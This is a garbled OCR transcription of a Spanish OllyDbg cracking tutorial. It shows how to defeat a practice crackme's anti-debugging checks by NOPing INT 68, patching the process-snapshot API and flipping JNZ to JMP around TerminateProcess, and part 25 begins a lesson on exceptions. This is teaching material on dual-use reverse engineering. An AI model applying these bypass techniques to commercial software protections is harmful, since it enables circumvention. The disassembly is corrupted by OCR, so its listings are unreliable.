c3 RETN 


8B85 26040000 |MOU EAX,DWORD PTR SS: [EBP+426] 
8080 38040000 |LEA ECX, DWORD PTR SS: [EBP+438] 


POPAD 
Y5 BS 
B3 01000000 MOU EAX, 1 
C2 BCcoa 
3 33494700 PUSH Antisoci.004749388 
3635 26040000 |MOU EAX,DWORD PTR SS: [EBP+426] 


Ono DDAATAarara 11 En ES Minha DTD >. TEODDLAADD1 


OFFSET Antisoci.<ModuleEntryPoint > 


Esta aun en la sección correcta ejecutemos el popad 


y 
0000 2 DO 


Allí ya se salio de sección, así que el problema se puede resolver nopeando este popad, pero lo correcto es 
que el popad inicial debe ser un pushad, que guarda los valores de los registros iniciales en el stack, y este 
popad es la sentencia opuesta los recupera, veamos que pasa si reemplazamos el popad inicial por un 
PUSHAD, reiniciemos. 


Apreto la barra espaciadora 


Assemble at 0049F001 


POPAD 


IV Fill with NOP's Cancel | 


Y escribo PUSHAD 


Assemble at 0049F001 
[PUSHAD] | y| 


IV Fill with NOP's Cancel 


PUSHAD 
$ 0s0aanon _ 
EB045D45 


PUSH EBP 


5 
3 

010000008 
RA Sn 


Ahora doy RUN y para en el segundo POPAD 


EE Pu] 94] $0] Y] +] LjEJMT|¡WHj|c] 
Ses UNE SHORT Antisoci. 0049F3BA 

ES 61000000 MOU EAX, 1 

C2 6Ccon RETN aC 

ES 233494700 PUSH Antisoci.B0474933 
8B25 26040000 |MOU EAX, DWORD PTR SS: [EBP+426] 


3D03D 38040000 |LEA ECX,DWORD PTR SS: [EBP+43B] 
51 PUSH ECX 


Pero esta vez el stack esta mas arriba 


BB12FFAS 
BB12FFAC 
BO12FFEO 
BB12FFB4 
BB12FFES 
BB12FFBC 


FEFFFFFF 
0012FFFO 
BB12FFC4 
7FFD4900 


| 
pr mm JE 


RETURN_to k 
0738|ntdll.7C920 


BB12FFCS 
BB12FFCC 


FFFFFFFF 
7C8399F3 
7C816058 
0000BG0B 
GOBODGOD 
GODB0000 
0049F001 


End of SEH chain 
SE handle 
kerne 132. 70816058 


OFFSET Antisoci.<ModuleEntryPoint> 


to kerne 
ntdll.7C920738 


mes 


DOI 


OFFSET Antisoci.<ModuleEntryPoint> 


0000000000000 


DODOD- 
DOES 


Vemos que se mantiene todo correcto 


layj 44 XX] Dj 01 A E 23) 3) 00 0 0 E E E 
6l 
Si Siagecco ¡e SHORT Ant is001.OBASF3RA 
tisoci.00474988 


c3 
£B35 26040000 |MOU EAXxX, DWORD PTR SS: [EBP+426] 
8D8D 38040000 |LEA ECX, DWORD PTR SS: [EBP+43B] 


CHAR 


ARATANAN uan 


Bueno aquí hay un problema de análisis 


Copy to executable 


Analyse code Ctri+a 


Appearance » | e 
a E Scan object files 


a] 44) x] HE pis] $4] u] + 1/E/m/T/wH]c)/]k]1 


== 


R analysis frorn module » 
Cro 


8BEC 
E Fo 
E3 E6464700 MOU EAX,Antisoci.B04746E0 
ES 731EF9FF 
2610 B36F4760 |MOU EBx,DWORD PTR DS: [476FB8] Ant isoci. 004 
2B03 MOU EAX, DWORD PTR_DS: [EBXJ 
ES 42F9FFFF 
2B03 MOU EAX, DWORD PTR_DS: [EBXJ 
ES 67FI9FFFF 
2B03 MOU EAX, DWORD PTR_DS: [EBXxJ 
ES _9MF9FFFF 
3B03 MOU EAX, DWORD PTR_DS: [EBxJ 
ES _SDE4FFFF 

MOU EAX, DWORD PTR_DS: [EBX] 
ES _SAE?FFFF 
2803 MOU EAX, DWORD PTR_DS: [EBXxJ 
ES DFE?FFFF 
3B03 MOU ERAX, DWORD PTR_DS: [EBXJ 
ES 1SE?FFFF 


A1 DC6E4700 MOU EAX, DWORD PTR DS: [476EDCI 
3800 MOU EAX, DWORD PTR_ DS: [EAXJ 
ES _6CE?FDFF 


MOU ECX,EBX 
MA NPECAFAR mM 


Md EA MANDA DTD Mos PAFTLEMSA1 


Ahora si se ve bien 


Veamos que ocurre si damos RUN 


[c] File View Debug Plugins Options Window Help 


vi+] $) 1] + ojejmjt[wjnjc]/]x]8) 


E 204424 BO0B0BBB6I! LEA ESP, DWORD PTR SS: [ESP] 
z 206424 Bn or ESP, DWORD PTR SS: [ESP] 
E 
E 
E 
E 90 NOP 
E 2805424 68 LEA EOX, DWORD PTR SS: [ESP+8] 
CD 2£ INT_2E 
__ Kal += 
| | Terminated 
E _——— —_—— — 


Veamos en el LOG del OLLYDBG si vemos algo ya que el programa se termina 


0049F001| Program entry point 
Analysing Antisoci 
O heuristical proc 


edures 


5| Module C:oWINDOWSsystem32uurtheme. dll 
Module Ci WINDOWS ssystem32rf au ltrep. dll 


Module C:WINDOWS3system32 VERSION. dll 
Module C:sWINDOWS+system32xUSERENUV. dl l 
Module Co WINDOWSsystem32MWINSTA. dll 
Module C:3SWINDOWSssystem32sNETAPI32.d11 
Module C:WINDOWS3system32nWTSAPI32.d1 1 
Module C:WINDOWSssystem32sSETUPAPI. dll 
Module C:WINDOWS3system32sSHLWAPT. dll 
Module C:WINDOWSssystem32Apphe lp. dll 
Un load C:WINDOWS3systemB2nNETAPI32.d1 1 
Un load C: WINDOWS ssystem32af au ltrep.dll 
Un load C:WINDOWSsystem32MwWINSTA. dll 
Un load C:5WINDOWSssystem32vUSERENUV. dl L 
Un load C:WINDOWSssystem32nWTSAPI32.d1 1 
Un load C:sWINDOWSssystem32xSETUPAPI. dll 
Process terminated, exit code COBOBBBS (-1073741819.) 


Vemos que hay una excepción, luego de parar en el BPX del popad 
Reiniciemos y repitamos los pasos para llegar nuevamente adonde estábamos. 


BP 
MOU EBP,ESP 
ADD ESP, -10 
53 PUSH EBX 
BS EbM464750 MOU EAX,Antisoci.0504746E0 
ES 731EF9FF [CALL Antisoci.DB4B6Sac 
28B1D BS6F4700 |MOU EBX,DWORD PTR DS: [476FB8] Antisoci.B04738D07C 
28B03 MOU EAX, DWORD PTR DS: [EBXJ 
ES 42F9FFFF 
MOU EAX, DWORD PTR DS: [EBXJ 
ES 67F9FFFF 
38B03 MOU EAX, DWORD PTR DS: [EBXJ 
ES 9MBF9IFFFF 
28B03 MOV EAX, DWORD PTR DS: [EBXJ 
ES SDE4FFFF 
2803 MOV EAX, DWORD PTR DS: [EBXJ 
ES 3AE?FFFF 
28B53 MOV EAX, DWORD PTR DS: [EBXJ 
ES DFE?FFFF 


MOV EAX, DWORD _PTR_DS: [EBx] 


ES 18E7FFFF 


Quitemos todas las tildes, menos la primera para que pare en las excepciones 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events Exceptions | Trace | SEX | Strings | Addresses | 


[Y Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
T” INT3 breaks 
T Single-step break 
Memory access violation 
T Integer division by O 
Invalid or privileged instruction 
T ANFPU exceptions Do 


[Ignore also following custom exceptions or ranges: 


DEEDFADE 
COOD001€É (INVALID LOCK SEQUENCE] 


Add range 
Delete selection 


Undo Cancel 


Demos RUN 


[ld ro Y IGYY ELIAS U Ls LU 1] dl > VU MAL U A 


GEES” Sri vil 


di ul + ujejmtiwH]cjs 


INT 68 
E] EC| 66:3D 86F3 CMP Ax, BF336 
75 Br 


66:B3 FEGO MOU AX, BFE 
66:E7 64 OUT 64, AX 1-40 cor 


c3 
SBCca MOV EAX, EAX 


Para en la excepción que vimos en el LOG 


Command Se | 
Access violation when reading [FFFFFFFF] - use Shift+F?¿F8/F9 to pass exception to program 


INT68 es una de las pocas excepciones que el OLLYDBG no puede manejar, podemos pasarla 
nopeandola. 


e 2) 33%) $348 3)" +)" 0 00 0) 109 0 00 159 0 E) 0 JA 


CD 68 INT 68 

66:3D 26F3 

75 0? 

66:B3 FEBO 

66:E7 64 ATA cammand 

ps Edit Ctr 
Assemble Fill with 00's 


Label Fill with NOPSs 


Parnmant 


EFE 1 LT ESE] $0) +) 12m T)wnjc 


90 NOP 
AN S36F3 CMP AX, BF336 


E] 
66:B3 FEGD MOU Ax, BFE 
66:E7 64 DUT 64, Ax 140 


Por otro lado sabemos que puede haber mas INT68 que molesten busquemos a ver si halla alguna mas, así 
lo nopeamos directamente. 


LA POH 1 As 
sT 


name (abel in current mod 


Find RraRES to » ] Name in all modules 
Wiewr > 
E bl 
156% Copy to executable » 
: cd a l il Sequence of cornméñds 
j ad ána ysIS | Pranetant 


[Y Entire block 


[c] File View Debug ds da pda Window Help 


L/E/m/T/w]H/c] 


INT 68 

ADD BYTE PTR DS:C[EDIJ,BH 
BOSA Ba ADD BYTE PTR DS: [EDXJ],CH 
Es ESGOFEFF JMP 
SB57 60 


MOU EDx, DWORD PTR DS: [EDI+66] 
3BC2 CMP_EAX, ED 
23 de 


Duc env 


Vemos que halla otro lo nopeamos 


[mm] PA] += $385 9] += Ha ES M0] Ey M9) 0] E 
0473EB7 


bu473EB9 


INT 6s 

CMP AX, BF386 
MOU Ax, BFE 
DUT 64, AX 
MOU EAX,ESI 


MOV EAX,ESI 


CO 6s 
66:3D S6F3 
75 Br 
66:BS FEGO 
66:E7 64 


2BC6 
ES 7TBEFFFFF 
8BC6 


I-C 


Buscamos nuevamente hay otro mas, lo nopeamos 


LEA AA lc $) |) +94 E y $ | 


BB473EB?. 95 NOP 

BO473EBS 95 NOP 

1u473EB9 66:3D S6F3 CMP AX, BF386 

aB4; Diw 75 07? 

an4? F 66:B3 FEGB MOU AX, BFE 

aan47 3 66:E7 64 OUT 64,AX 1/0 cor 
Maña ACI MM CS 


Si hacemos CTRL + L continua buscando a partir del ultimo que hallo 


Ya no halla mas ahora si damos RUN 


¿ántisccia] Gracknme 1 


SS 
SERIAL 


PESA Z 


Ml 0 Dl ll 


fr 


Como ven todo eso hay que hacer para que corra el OLLYDBG con los plugins, ahora tratemos de 
correrlo en un OLLYDBG sin plugins, y sin renombrar ni parchear. 


ra 
CJ 'odbq110 FINAL sin plugins 


Allí descomprimí un OLLYDBG sin plugins, bah el único que tiene es el command bar, ya que ese no 
protege de nada es solo por comodidad, a este OLLYDBG, le hice una carpeta diferente de plugins y el 
path a los plugins lo apunte allí. 


El Appearance > 
General | Defaults | Dialogs Directories | Fonts | Colours | Code highlighting | 


UDD path: 
[C:todbgl 10 FINAL sin plugins Browse | 


[Y Backup old .udd files 


Browse 


== PLUGINSOLLY2 


Archivo Edición Wer Favoritos Herramientas Ayuda 


: Q Atrás * Q Dd ya ) Búsqueda E Carpetas ER 


(3 C:PLUGINSOLLY2 


Tareas de archivo y carpeta y 


: Dirección 


>» 


Otros sitios CmdBar. ini 


$e Disco local (C:) = Opciones de configuración 
q 1 KB 

(E Mis documentos 

a] Documentos compartidos 


¿ Mi PC 


Como vemos allí hay solo dos plugins, lo arranco en ese OLLYDBG 


OllyDbg - Antisocial1.exe - [CPU - main t 


[c] File View Debug Plugins Options Window Help 


c3 


A A 


Repito las operaciones de cambiar el popad 


MOU EAX, 1 
PUSH O 
RFTN 


Poner el BPX en el POPAD veamos si llega alli demos RUN 


344 Xx] Jl] bijsi $03] 8] = LJEjM]T|w)H]c]/]: 


0|v?75 08 JNZ SHORT Antisoci.B049F3BA 
Es 010000090 MOU EAX, 1 

C2 BACA RETN BC 

és 3828494700 PUSH Antisoci.00474988 

eBes 26040000  |M0U EAX.DWORD PTR SS: CEBP+426] 


Lleguemos hasta el código del programa desempacado. 


¡—— E ERE A AAN EDS PAN: A 


E3 EB464700 MOU EAX,Antisoci.004746E0 
ES 731EF9FF 
3B1D B36F4700  [MOU EBX, DWORD PTR DS: [476FB8] Ant isc 
3B03 MOV EAX, DWORD _PTR_DS: [EBX] 

ES 42F9FFFF 

3B03 MOU EAX, DWORD PTR_DS: [EBx] 

ES 67F9FFFF 

3B03 MOV EAX, DWORD PTR_DS: [EBX] 

ES _9MF9FFFF 

3B03 MOU EAX, DWORD PTR_DS: [EBX] 

ES _SDE4FFFF 


MOV EAX, DWORD _PTR_DS: [EBx] 
ES _3RE?FFFF 
3B03 


Es _DFE?FFFF 
aan 


MOU EAX, DWORD PTR_DS: [EBXJ 


MOLL FO MAA ATA MN. PATA 


Podemos nopearle los INT68 o quitar las tildes en exceptions y cada vez que pare si es un INT68 
nopearlo y si no pasarlo con SHIFT +f9 como a cualquier excepción. 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 


Security | Debug | Events Exceptions | Trace | SEX | Stings | Addresses | 


[Y Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
[INT breaks 
TT Single-step break 
Memory access violation 
Integer division by O 
Invalid or privileged instruction 
 ANFPU exceptions 


TF Ignore also following custom exceptions or ranges: 
Add range Lo 


Veamos que apis usa el programa para esto debemos recordar que la tilde en 


RS Debugging options 


Commands | Disasm | cpu | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security Debug | Events | Exceptions | Trace | SFX | Strings | Addresses | 


[Y Set high priority when tracing debugged process 
TT Wam about frequent conditional breaks 
[Y Smart update of memory map 


[Y Compress analysis data 


Search for references in: 
(” Executable code of corresponding module 


Use hardware breakpoints to step or trace code 


Hide norr-existing source files 


Undo Cancel 


Debe estar colocada alli para que muestre la información de la seccion en que estamos. 


Wievy 


904A5005 
DO49FFED 
BO49FFSC 
B04A810D 
DO49FF64 
pa49FOB1 
B04A60DD 
BO4ABDED 
B04AB105 
DO4ABDES 
BO4ADOFS 


B04ABOFD Import 


Bueno vemos que no hay apis de las sospechosas, pero usa muy pocas apis y esta alli GetProcAddress 
para cargar mas apis nuevas, asi que pongamos un BPX en la api GetProcAddress. 


label) in current module € 


A 


PCarnraarnd Cr 


GetKeyboardType 
2, GetModu leHandleA 
GetProcAddress 
Imagel ¡st_SetlIconSize 
«LoadL ¡braryA 
ntryPoint> 
RegbueryUalueExA 
RegQueryUa lueExA 
SafeArrayPtrOf Index 
SysFreeString 
Unreal ize0bject 
«WindowFromPoint 


Command Bp GetProcAddress] y] EP adar 


Demos RUN 


BU4UB324 
ra m=ials15151] 
BO040B350 
(5Js]5/51515151=3 


ProcN 


mel 


MAJO 


BB12FFS80|Pointer to 
BB4BEFF4|SE handler 
aBB12FF?S 


Di 


7CS0000Ó 
00472724 
aa0aBabF 


hModu 
Proct 


v— + 


4 


BO12FE?S 


Aquí vemos la primera sospechosa la api que nos hace la foto de todos los procesos que están corriendo 
en nuestra maquina, lleguemos al RET y pongamos un BP EAX ya que en EAX estará la dirección de la 
api en nuestra maquina. 


CALL to Get 
[broca te 
a 


IrOrdinal 


e 


mel 


ess from Antisoci.B0440B31F 
7Ca00006 (kernel32) 
"GetDiskFreeSpaceExA” 


0040BFE1| RETURN to Antisoci.BB4BBFE1 from Antisoci.0040B308 


next SEH record 


Proc ESS 
YCa00l 


: rom E 
0 ErcateToolhe Ip32Snapshor” 
lirOrdinal = 


0047283F| RETURN to Antisoci.6047283F from Antisoci.004725B8 


00473D7C' Antisoci.00473D7C 
00472EA8! RETURN to Antisoci.00472EA38 from Antisoci.00472334 


CMP DWORD PTR_SS: [EBP+10],0 


0R EDI,EDI 


DODr-O0 TD AHnDD 


7C8BACe? 


it OLFFFFFFFF) 
it BLFFFFFFFF) 
it BLFFFFFFFF) 
it BLEFFFFFFFE) 
it ?FFDFOBOLFFF) 


MRDTDO 


7 r BP ad 


ex] ajo] visi $03) e] » L]Ejm]T]w)jH] cl 4] K]B/R]... s| i=138]* 


ESI 
MOU_ESI, DWORD PTR SS: [EBP+C] 
TEST ESI,ESI 


ESI 
MOV ESI,DWORD PTR SS: [EBP+C] 
TEST_ESI,ESI 


s TE ERENAANN 


hModule = 
ProcNameOD 


hz to 


le 


Hmm otra parecida a la anterior por si acaso pongámosle un BP también 


A a fit cl AN la AT Al 3 PY Py y PP y y" "AA 


SBFF MOV EDI,EDI TOOLHELP 
7 6] 55 PUSH_EBP 
8BEC MOU EBP,ESP 
9| 56 PUSH ESI 
al FF?75 08 PUSH DWORD PTR SS: [EBP+8] 
D| $A aa RUSH BL 
Demos RUN 


_ from Ant isoci.004/2650 


3F from Antisoci.B0472 


Bueno esta es conocida BP en ella 


AE PEAEAAEAPAAAES ESTE ABRAEERAERSEEAS SS) 94 9 9049 1 94 4 $ | 


, 
55 PUSH EBP AS 
8BEC MOU EBP,ESP 

S1EC 30020000 |SUB ESP, 230 

al Ccasas7c MOU, EAX, DWORD PTR DS: [7C8836CC] 


hModule = Fl 
ProcNameOr 


( hz to Der roohaaress: Er a 


*] 


DI 


RETURN to Antisoci.0047283F from Antisoci.B0472588 


Lo mismo 


MOU EDI,EDI NEXT 
PUSH_EBP 

MOU EBP,ESP 
SUB ESP,238 
MOV EAX, DWORD PTR DS: [7038836001 


ess from Antisoci.bB472674 


y (kerne 
inal = ”P; First” 


TT 


283F from Antisoci.B04725B8 


Es 


F from Antisoci.Bb64725B3 


73D7C! Antisoci. 10047807 


Allí para en la api que saca foto y como toda la protección depende de la foto, desde la cual de donde 
trabaja con la lista de procesos, threads, y no se cuantas cosas mas testea todo de la bendita foto, podemos 
intentar parchear esta api de la foto para que no devuelva el handle de la misma sino cero, para ellos 
vamos al ret de la api. 


D 83038 FF OR_EAX, FFFFFFFF 
Glw EB 43 
8B45 ac MOU EAX, DWORD PTR SS: [EBP+C] 
5 SE POP ESI 
ca LEAVE 
Y C2 6Ba0B 
e 90 NOP 
B 90 NOP 
C 90 NOP AS 
D 90 NOP 
E 90 NOP 
F SBFF MOV EDI,EDI 
| 8. PUSH_EBP___ 


SA TA 


8B45 BC MOU EAX, DWORD PTR SS: [EBP+C] 
SE POP ESI 

Cc9 LEAVE 

3300 X0R EAX, EAX 

C2 0300 RETN 8 

90 NOP 

90 NOP 

90 NOP 

2RFF MA ENT OEMT 


Con eso devolverá cero y el programa no tendrá handle para poder manejar las fotos ni averiguar sobre 
ellas, esa es una posibilidad la otra cambiando en el codigo del programa llegamos al ret dela api la cual 
no modificamos. 


[9 AG AJO] 4 FE A Y E 
Fl w EB 


3 
a ac MOU EAX, DWORD PTR SS: [EBP+C] 


Alli vemos un poco mas abajo unos saltos JNZ y justo abajo los call a TerminateProcess que cerrarian el 
OLLYDBG con la llamada anterior a OpenProcess para obtener el handle, y vemos que hay como cinco 
de estas partes justo una debajo de otra 


PUSH_B ExitCode = BM 

MOV EAX, DWORD PTR DS: [ESI+8] 

PUSH EAX Pr 

PUSH -1 In t e = TRUE 
6A bl PUSH 1 Ac = = TERMINATE 
ES SS83BF9FF OpenProcess 
50 PUSH EAX hProcess 
ES EASBF9FF TerminateProcess 


LEA EDx, DWORD PTR_SS: [EBP-138] 


DU EA E E ASCII "FYF+HCEZMMP” 


3B95 CSFEFFFI | MOU EDx, DWORD PTR SS: LEBP-138] 
3B45 FC MOU EAX, DWORD PTR SS: [EBP-4] 
ES C418F9FF 


ExitCode = 8 


3B46 B3 MOU EAX, DWORD PTR DS: [ESI+8] 

56 SH EAX Id 

6A FF able = TRUE 

6A Bl : = TERMINATE 

56 S33BF9FF scr ad 
IFCIOCES=S> 

ES BS3BF9FF TerminateProcess 


3D95 C4FEFFFI] LEA EDx, DWORD PTR_SS: [EBP-13C] 
93304700 


Bs MOU EAX, jejebuen. 00473098 ASCII "FYF-1113XSU" 
ES SIFEFFFF || CALL jejebuen: 0047204 


3B95 C4FEFFFI] MOU EDxX,DWORD PTR SS: [EBP-13C] 
2B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 


65A Ba PUSH_B ExitCode = 
3846 B8 MOU EAX, DWORD PTR DS: [ESI+8] 

50 PUSH EAX 

6A FF PUSH -1 

6A B1 PUSH 1 

ES 1E3BF9FF || CALL <JMP.Skerne132.0penProcess> 

58 PUSH EAX hProcess 

ES SO3BF9FF || CALL <JMP.Skernel32.TerminateProcess> [LTernminateProcess 


LEA EDX, DWORD PTR SS: [EBP-140] 
HOJ ER, Je jebuen . 084 230n0 ASCII "FYF/34SFEBPN" 
8895 COFEFFFI| MOU EDX, DWORD PTR SS: LEBP-148] 

8845 FC____ || M0U EAX, DWORD_PTR_SS: [EBP-4] 


Por supuesto cambiando todos los saltos JNZ por JMP, evitamos que el programa llegue a 
TerminateProcess evitamos y que cierre el OLLYDBG. 


Esta primera parte esta solucionada ahora sigamos con la segunda parte de la protección, demos RUN 


E a jale a AA e iaa YO OO 


INT 68 

CMP Ax, BF336 
MOU Ax, BFE 
DUT 64, Ax 


CD 68 
66:3D S6F3 
75 ar 
66:B3 FEGO 
66:E7 64 


DODA 


Nopeamos y damos RUN y corre pero se cierra el programa, si le pongo solo el plugin HideDebugger 
1.23f y lo protejo contra FindWindows/EnumWindows corre bien con los pasos anteriores que vimos. 


El tema del lugar de donde se cierra es aquí 


38895 DCFEFFFI] MOU EDX, DWORD PTR SS: CEBP-124] 
OP EAX 


53 

ES F914F9FF 

75 BC JNZ SHORT jejebuen. 004/3305 

Ai _DC6E4700 || MOU EAX,DWORD PTR DS: [476EDC] 
23600 MOV EAX, DWORD PTR_ DS: CEAXI 

ES _C7EFFFDFF 


8D35 DIFEFFFIP LEA EAX, DWORD PTR SS: [EBP-12C] 
28BD6 MOV EDX,ESI 
69 Gsoranas || NOU ECX, 108 


PUSH EBX 
PUSH ESI 
PUSH _EDI 
MOU ESI,EAX 
MOV EDI, EDX 


TEST ESI,ESI 


DBDI23FS3 
ECX FFFFFFFE 
EDx 6MBD9242C ASCII "Ol lyDbg” 
EBX 61680468 
ESP 6B12FE44 
EBP 0B12FFA4 
ESI MBD923F3 
EDI 66092420 ASCII "Ol lyDbg” 


EIP 004047F7 jejebuen.D04B047F7 


Co ES 0023 32bit B(FFFFFFFF) 
PO CS 0618 S2bit D(FFFFFFFF) 
AO SS 0023 32bit O(FFFFFFFF) 


AA ARAYA Amia MiFrFrrrrrri 


DOD9ZEAG ”0l lyDbg” 
ECX FFFFFFFE 
EDx 6BD92ED4 ASCII ”OllyDba” 
EBX B20304BE 
ESP BO12FE44 
EBP B012FFA4 
ESI 4BD92ER0 ASCII ”OllyDba” 
EDI 00D92ED4 ASCII "Ol lyDbg” 


EIP 004047F7 jejebuen.004047F7 


1C920738|ntdll. 70920738 e . E 
A RETATTA ASCII ”OllyDba -— jejebueno.exe — [CPU - main thread, module jejebuenl” 
B04732F7| RETURN to jejebuen.004732F7 from jejebuen.004047F0 
BuB12FFB4| Pointer to next SEH record 

b04733E7|SE handler 

BO12FFA4 
FFFFFFFF 
00478D7C| jejebuen . 00478D7C AS 


BBD92CDC [ASCII "URSOFt” 

B60D92CA4 ASCII "WinDowse” 

GBBD9BBEC ASCII "WinDow” 

B6D92C96 | ASCII "DeDe” 

B6D92044 | ASCII "WinDowse” 

BBD92C5C|ASCII "inD” 

B6D92ED4 | ASCII ”OllyDbg” 

B6D92E54 | ASCII ”OllyDba - jejebueno.exe — [CPU - main thread, module jejebuenl” 
B6BD92EA6 | ASCII ”OllyDbg” 

B6BD92E38 | ASCII "Symbol Loader” 

BBD92DCC|ASCII ”OllyDbg - jejebueno. exe -— [CPU - main thread, module jejebuen]” 
B6D91BES| ASCII "ule jejebuen]” 

B6D92DA8| ASCII "TRW2666 for Windows 9x” 

B6D9203C | ASCII ”OllyDba - jejebueno.exe — [CPU - main thread, module jejebuen]” 
BBD92CF6 | ASCII ”OllyDba - jejebueno.exe — [CPU - main thread, module jejebuenl” 
796CÉ6CAF 
20676244 


Crenanan 


La cuestión, es que aquí compara si hay cosas malas, jeje y que todo eso se evita con el jnz que esta a la 
salida del primer CALL si lo cambio por JMP 


anar: 


[A] PJ] 23 $85) 23] 224 IN O 0 O O IA IA O 


MOU EAX, DWORD PTR DS: CEAX] 


3600 

ES C7FFFDFF 
3D35 D4FEFFFI] LEA EAx, DWORD PTR SS: [EBP-120] 
3BD6 MOU EDX,ESI 

69 66016000 || MOV ECX, 1068 


ES 4513F9FF | CALL Tieiebuencan4n465c 


Ese es el salto clave si lo cambio por JMP 


MUA AO AAA 2 IA 


ES F914F9FF 

EB ac JMP SHORT jejebuen. 004/3305 
A1 DC6E47006 || MOU EAx, DINORD PTR DS: [4/6EDC] 
MOV EAX, DWORD PTR_ DS: [EAXJ 


3B00 

Es C7FFFDFF 
3D35 D4FEFFFI] LEA EAx, DWORD PTR SS: [EBP-120J 
3BD6 MOU EDX,ESI 


ES Gporaoas || MOV ECX, 108 


Evita el segundo call que si lo vemos dentro 


ENYA] A EE TO 


5 ES FB7FFEFF 
. 8400 
«e 74 07 

5A 60 

EE D4SEFEFF 

3040 au LEA EAX, DWORD PTR DS: CEAX] 
53 PUSH EBX 


ps = Ml 
PostQuitMessage 


Es el que te lleva a PostQuitMessage y va cerrando la ventana pues esta por terminar el programa lo cual 
lo hace mas adelante, pero aquí ya la decisión esta tomada, el PostQuitMessage es que se va a cerrar el 
loop de mensajes y no queda otra que el crackme se cierre ya que no tiene mas ventanas. 


Por supuesto si me dicen como halle ese JNZ pues es fácil. 


Una vez que paso la primera parte de la protección, pongo un BPX en PostQuitMessage. 


Command Bp PostQuitMessage y] | 
Breakpoint at user32.PostQuitMessage 


[O] File View Debug Plugins Options Window Help 


CEBE ea] visi slo] 1] + Ljejmtiwju]c[7]k[B]rÍ» 


8BFF MOU EDI,EDI ntdll.7C920738 
PUSH_EBP 
MOU EBP,ESP 
PUSH 33 
PUSH DWORD_PTR_SS: [EBP+8] 
CALL _user32.77D184A6 

POP EBP 


RETN_4 
X0R EAX, EAX 
INC EAX 


XOR_EAX, ERX 


FF7S 08 

ES 28672FFFF 
5D 

C2 6400 
3300 


¡DO0O0O0OO 


40 

E9 ER230000 
3300 

E9 ?DCSFFFF 
90 


90 
n21 : 39ñn 


Para en la api miro el stack a ver de donde fue llamado 


= Ie A from jejebuen. 
+4itLode = 

RETURN to jejebuen.00473305 from jejebuen. 00453200 
Pointer to next SEH record 

SE handler 


4645320 

15J51515]5151515] 
00473305 
BB12FFB4 
BO4733E7 
BB12FFA4 
FFFFFFFF 
B04738D7C 
BODIBBEC 
BBD92C738 


AAN” ara 


y 


A 


Dí 


Amas 


Dal 


DI 


DD 


jejebuen.00473D7C 
ASCII "URSOFt” 
ASCII "WinDowse” 


MOrFTT Pla Piar? 


Y 


Ebo 


Dí 


Voy a 4532d7 ya que el stack me dice que fue llamado de alli 


a ORAR A ac 1 19) 947171414 ppp] 
POP EBP 


TD 
. 


90 NOP 
5 ES FB7FFEFF 
. 8400 TEST AL,AL 
.v 74 07 
£5A 4a PUSH a [5 ¿itCode = 8 
a D43SEFBFF PostQu ¡tMessage 


3046 au LEA EAX, DWORD PTR DS: [EAXI 
53 SH EBX 


PUSH_ESI 


Ana ST 


. dr os 


mn, 


Por supuesto probé ese JE que esta antes del PostQuitMessage y no evitaba que se cierre al invertirlo, así 
que fui al segundo RETURN TO que encontré en el stack. 


ala 2. E from jejebuen. 10453207 
itCode = 


A 


(AE 


ointer to next 
SE handler 


0047337 
OB12FFA4 
FEFFFFFF 
9B478D7C|j 


aRnaanro Ad 


Dí 


ebuen . 004 75D7C 
2? rel 


A 7 


Este viene de 4532CC 

uug . »bo FPUP_ EHX 

aná 

904 

bn4 . r . 

an4 . |8B00 MOU EAX, DWORD PTR DS: CEAX] 
aná . (ES C7FFFDFF 

an4 > 68D85 D4FEFFFI| LEA EAX, DWORD PTR SS: [EBP-120] 
004; . 28D6 MOU EDX,ESI 

aan47 . B9 oou10000 || MOU ECX, 100 

ARA?: l FA 4512FSFF | Mais ie cARAAARN. 


Como vemos este call se evita con el JNZ anterior con lo cual no entra y no va a PostQuitMessage y al 
cambiarlo por JMP veo que corre perfecto sin ningún plugin. 


Adjunto el crackme desempacado que corre en cualquier OLLYDBG por supuesto ustedes aun no 
aprendieron a desempacar en este curso, por lo cual aun eso no se pide, pero si quieren verlo por 
curiosidad, allí esta adjunto pueden probar que corre en cualquier OLLYDBG se llame como se llame y 
sin ningún plugin, ya que además de desempacarlo, le hice los cambios permanentes que vimos en este 
tute y con eso quedo limbito como culito de bebe. 


Hasta la parte 25 ahora si empezamos con las excepciones 
Ricardo Narvaja 
06 de enero de 2006 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 25 


EXCEPCIONES 


Veremos en esta parte 25 el manejo de excepciones, que suele ser un problema para los newbies, pero en 
si no es un tema difícil si leemos un poquito sobre el. 

Una excepción se produce en un programa cuando el procesador ejecuta una operación no valida, veamos 
algunos ejemplos en el mismo OLLYDBG, abramos el crackme de cruehead para escribir algunos 
ejemplos de excepción. 


- [CPU - main thread, module CRACKME] 


[e] File View Debug Plugins Options Window Help 
Yu) +) 1J2e/m)T)w)H]c)4Jk]8/r]--Js| ¿58 ?| 


ES FFo40000 | CALL <JMP.2KERNEL32. GetModuleHandleA> |LGetModu leHandleA 
AS CA204006 [MOV DWORD PTR DS: [4020CA1,EAX 

5A 46 PUSH A Title = NULL 

68 F4204000 |PUSH CRACKME. 004920F4 (ss = "No need to disasm the code 
Es A644000B 

BECA OR EAX, EAX 


O O E FindlindowA 
A REI 


Allí tenemos el crackme de cruehead 1, parado en el Entry Point y escribiremos en la primera línea como 
hacíamos cuando veíamos la instrucciones de assembler, algunas instrucciones que al ejecutarlas nos 
producirán una excepción. 


Usaremos algunas definiciones del tute de Mr Silver de excepciones y las graficaremos aquí con el 
ejemplo. 


Acceso a memoria no válida: Se producen cuando un thread intenta acceder en un modo no permitido a 
una posición de memoria a la cual no tiene acceso. Por ejemplo se puede producir este tipo de excepción 
si el thread intenta escribir a una posición de memoria de solo lectura. 


Escribo en el OLLYDBG la siguiente linea. 


[O] File View Debug Plugins Options Window Help 


EXE EE! $0) 3) + 1jejmtiwjn 


00401006 As 571045608 (MOU DWORD PTR DS: [401057],ERX 
(151513 ADD BYTE PTR DS: [EAXJ,AL 
AS Caza4ana |MOU DWORD PTR DS: [4820CA],EAX 


5A Ub PUSH O 
AR FÍ249AAA_|PLUSH CRAFCKME. ARIAS AF A 


